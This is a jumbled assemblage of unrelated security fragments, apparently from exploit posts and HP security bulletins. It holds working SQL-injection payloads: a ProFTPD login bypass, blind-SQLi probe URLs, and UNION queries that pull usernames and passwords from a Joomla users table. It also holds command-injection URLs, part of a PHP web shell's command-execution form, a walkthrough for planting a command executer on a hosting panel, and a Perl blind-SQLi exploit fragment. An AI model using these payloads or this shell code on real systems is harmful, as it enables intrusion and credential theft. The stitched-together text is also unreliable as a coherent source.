--- SQL Log ---
select @@version = 5.0.83-enterprise-nt
select user() = vpuser@localhost
select @@datadir = C://GMSVP//MySQL//data//
SELECT count(schema_name) FROM information_schema.schemata = 43
SELECT schema_name FROM information_schema.schemata limit 0,1 = information_schema
SELECT schema_name FROM information_schema.schemata limit 1,1 = mysql
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01531379
Version: 1
HPSBMA02361 SSRT080119 rev.1 - HP OpenView Select Identity Connectors running on Windows, Local Information Disclosure
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2008-09-04
Last Updated: 2008-09-04
else if ( empty($_POST['message']) ) {
redirect_header("javascript:history.go(-1)", 2, _MD_ERRORMESSAGE);
exit();
}
else {
$sql = "SELECT * FROM ".$bbTable['forums']." WHERE forum_id = ".$_POST['forum'].""; // <-------- !!!
if (!$result = $db->query($sql)) {
redirect_header("index.php", 2, _MD_CANTGETFORUM);
exit();
}
...
Source distribution
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
26454 futex(0x8a6ff90, FUTEX_WAIT, 1, NULL <unfinished ...>
26453 select(14, [11 13], NULL, NULL, NULL <unfinished ...>
26455 futex(0x8a70000, FUTEX_WAIT, 5, NULL <unfinished ...>
26456 futex(0x8a70070, FUTEX_WAIT, 3, NULL <unfinished ...>
26457 futex(0x8a700e0, FUTEX_WAIT, 1, NULL <unfinished ...>
26459 select(0, NULL, NULL, NULL, {0, 55000} <unfinished ...>
26460 select(0, NULL, NULL, NULL, {0, 953000} <unfinished ...>
Looks like a very serious issue to me - it works on our ProFTPD
1.3.2rc2 Server (latest stable on gentoo).
220 ProFTPD 1.3.2rc2 Server (Pumpkin) [xx.xx.xx.xx]
USER %') and 1=2 union select
1,0x24312452565a583533784324716a304d4d6b4670426b4b486177644264756634392f,uid,gid,homedir,shell
from ftp #
331 Password required for %')
PASS 1
230 User %') and 1=2 union select
ProLiant DL/ML 100 G5-Series
The Lights-Out 100 Remote Management Firmware Upgrade v3.11 or later is available for download. Obtain the Firmware Upgrade for the HP ProLiant DL/ML100 series Lights-Out 100 Remote Management Firmware v3.11 or later as follows:
Click on the following URL and then follow the instructions below: http://welcome.hp.com/country/us/en/support.html?pageDisplay=drivers
1. Under Select a product category, select Servers.
2. Select ProLiant/tc Series Servers.
3. Select the appropriate ProLiant DL/ML100 series G5 server.
4. Select the appropriate operating system.
5. Select Firmware - Management.
6. Select the Firmware upgrade for the appropriate HP ProLiant DL/ML100 G5-Series servers; Lights-Out 100 Remote Management Firmware v3.11 or later.
Vendor notified on 12-13-07 and the product development manager was uncooperative and hung up on us.
Sample Query Logs from Exploiter Beta:
======================================
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin')
Column found: table=Admin, column=ID
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'ID'
Column found: table=Admin, column=LastLogin
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'LastLogin'
Column found: table=Admin, column=OrgId
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>command [ system , shell_exec , passthru , Wscript.Shell , exec , popen ]</b></td></tr></table>','center','top');
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');
$tb->headerform(array('content'=>'<FONT COLOR=#9C9C9C>cmd:</FONT>'.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' '.$tb->makeinput('command').' '.$tb->makeinput('Run','command','','submit')));
echo"<tr class='secondalt'><td align='center'><textarea name='textarea' cols='100' rows='25' readonly>";
if ($_POST['command'] ) {
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01391833
Version: 1
HPSBMA02317 SSRT080026 rev.1 - HP Select Identity Software, Gain Unauthorized Access
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2008-03-11
Last Updated: 2008-04-01
> Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if you login with username like:
Could you please provide the version number which is affected by this?
Running ProFTPD Version: 1.3.0 (stable) on Linux (Debian etch) I cannot
reproduce your report.
> USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --
>
> and a password of "1" (without quotes).
>
> which leads to a successful login. Different account logins can be made successful using the limit clause (e.g. appending "LIMIT 5,1" will log you in as the 5th account in the users table).
>
Advisory: IceWarp WebMail Server: SQL Injection in Groupware Component
During a penetration test RedTeam Pentesting discovered multiple
SQL-Injections in the IceWarp WebMail Server. Attackers that are in
control of a user account for the web-based email and groupware
components are able to execute arbitrary SQL SELECT statements and
therefore read any data from the DBMS that are accessible by the Icewarp
eMail Server.
Details
Windows Environment:
1. Locate the files "webengine.exe" and "freeaccess.spl". The files
are located in the "$NX_ROOT\bin" and "$NX_ROOT\bopcfg\www" directory
respectively.
2. Right click on each of the files and select Properties.
3. Select the General tab.
4. If either file timestamp is earlier than indicated in the below
table, the installation is vulnerable.
File Name
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01658614
Version: 1
HPSBMA02403 SSRT090007 rev.1 - HP Select Access Running on HP-UX, Linux, Solaris, and Windows, Remote Cross Site Scripting (XSS)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2009-01-28
Last Updated: 2009-01-28
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2.6- If you see "Error: 70500170 : User already exists in either OS or Database." it means that everything is OK and your permission has already been set.
2.7- Now you have a full access to "[HCPATH]\Forum\DB".
Note: You can do that with "[HCPATH]\phpBB\phpBB\db" too because there is "db" directory too.
2.8- So you can upload your command executer there, but you need a file uploader at first on "testuser.com" to upload your command executer on "[HCPATH]\Forum\DB".
2.9- If your permission has not been set correctly, it is always because of a limitation on creating a new user. So you must log in with the reseller's username and make a new plan that includes permission to create new user accounts, then sell it to your username. Alternatively, you can increase your credit amount (part 6), buy a plan with many web accounts, select it, and repeat these operations from the beginning. (Note: This vulnerability works properly and there is no exception like the others!)
\\\\\\\\\\\\\\\\\\\\\
/////////////////////
3- [Remote Attacker] can make a new user.
[+] Exploding:
[*] Checking table:
[~] Exploit: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count(*) FROM [TABLE]) >= 0
[~] Exploit2: http://localhost/[path]/template_permalink.asp?id=78 and exists (select * from [TABLE])
[~] Example: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count(*) FROM tblauthor) >= 0
[~] Example2: http://localhost/[path]/template_permalink.asp?id=78 and exists (select * from tblauthor)
[~] If you don't see any error, the table exists.
#######################################################################
Vulnerability 1: Internet Explorer Select Element Remote Code Execution
#######################################################################
Original advisory:
http://ifsec.blogspot.com/2011/10/internet-explorer-select-element-remote.html
I. OVERVIEW
There is a vulnerability in Internet Explorer which enables execution
[+] Exploding:
[*] Checking table:
[~] Exploit: http://localhost/[path]/full_text.php?nid=[NUM] AND (SELECT Count(*) FROM [TABLE]) >= 0
[~] Exploit2: http://localhost/[path]/full_text.php?nid=[NUM] and exists (select * from [TABLE])
[~] Example: http://localhost/[path]/full_text.php?nid=4855 AND (SELECT Count(*) FROM binn_users) >= 0
[~] Example2: http://localhost/[path]/full_text.php?nid=4855 and exists (select * from binn_users)
[~] If you don't see any error, the table exists.
A) Multiple Remote Command Execution
http://site/path/admin/uploadItem.php?image=.; ;
http://site/path/admin/removeItemResponse.php?ItemID=.; ping localhost ;
http://site/path/admin/removeCategoryResponse.php?CategoryID=-1' UNION SELECT '; ping localhost ;'%23
B) Multiple SQL Injection
http://site/path/description.php?II=-1' UNION SELECT 1,2,3,4,5,6,7%23&UID=VALID UID HERE
Note the query in the SESS_getUserIdFromSession() function:
...
if ($md5_based == 1) {
$sql = "SELECT uid FROM {$_TABLES['sessions']} WHERE "
. "(md5_sess_id = '$sessid') AND (start_time > $mintime) AND (remote_ip = '$remote_ip')";
} else {
$sql = "SELECT uid FROM {$_TABLES['sessions']} WHERE "
. "(sess_id = '$sessid') AND (start_time > $mintime) AND (remote_ip = '$remote_ip')";
[+] Exploding:
[*] Checking table:
[~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) >= 0
[~] Exploit2: http://localhost/[path]/[any module]?id=1 and exists (select * from [TABLE])
[~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) >= 0
[~] Example2: http://localhost/[path]/[any module]?id=1 and exists (select * from users)
[~] If you don't see any error, the table exists.
IV. SAMPLE CODE
_______________
A) Multiple SQL Injection
http://site/path/index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version
http://site/path/index.php?option=com_amblog&task=article&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users
http://site/path/index.php?option=com_amblog&task=newform&catid=-1 UNION SELECT 1,CONCAT(username,0x3a,password) FROM jos_users
Use the following procedure to download the software required.
Go to the HP Web site at the following URL: www.hp.com
Select: "Support and Drivers"
Follow: Step 1 - click the button: "Download drivers and software (and firmware)"
Step 2 - select product category: "Storage"
Select: "Storage Software"
Select: "Storage Replication Software"
Select: "HP StorageWorks Storage Mirroring Software"
// if not, get from mysql and save to cache
if (isset($cached_links[$id]) && $usecache == TRUE) {
$link = $cached_links[$id];
} else {
$link = $db->get_row("SELECT " . table_links . ".* FROM " .
table_links . " WHERE link_id = $id");
$cached_links[$id] = $link;
}
-----------------------------[source code start]-------------------------------
if ($msg) {
$msg = trim($msg);
$res = mysql_query("SELECT id, acceptpms, notifs, email, UNIX_TIMESTAMP(last_access) as la FROM users WHERE username=".sqlesc($receiver)."");
$user = mysql_fetch_assoc($res);
if (!$user)
$message = "Username not found.";
...
...
function SEC_authenticate($username, $password, &$uid)
{
global $_CONF, $_TABLES, $LANG01;
$result = DB_query("SELECT status, passwd, email, uid FROM {$_TABLES['users']} WHERE username='$username' AND ((remoteservice is null) or (remoteservice = ''))"); //<------------------- SQL INJECTION HERE
$tmp = DB_error();
$nrows = DB_numRows($result);
if (($tmp == 0) && ($nrows == 1)) {
$U = DB_fetchArray($result);
{
$db =& $this->DB(); if (!$db) return false;
$this->_where = $where;

$save = $db->SetFetchMode(ADODB_FETCH_NUM);
$row = $db->GetRow("select * from ".$this->_table.' WHERE '.$where,$bindarr);
$db->SetFetchMode($save);

return $this->Set($row);
}
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01346579
Version: 1
HPSBMA02309 SSRT080013 rev.1 - HP Select Identity Software, Remote Unauthorized Access
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2008-02-06
Last Updated: 2008-02-06
}
#Check to make sure the target is vulnerable
if($b!=1||$p!=1){
$vulnerable=1;
#Yes, I am assuming the default table prefix; it's a shame you can't access information_schema.
#No prefix is needed for the non-cookie attack because I do not need a union select or sub-select!
bin_finder(2,1,"1","smf_members","and 1!=1");
if(int(@result[0])!=0){
$vulnerable=0;
}
$globPos=1;
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01502023
Version: 2
HPSBMA02346 SSRT080097 rev.3 - HP OpenView Select Identity Active Directory Bidirectional LDAP Connector, Remote Unauthorized Access
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2008-07-14
Last Updated: 2008-07-21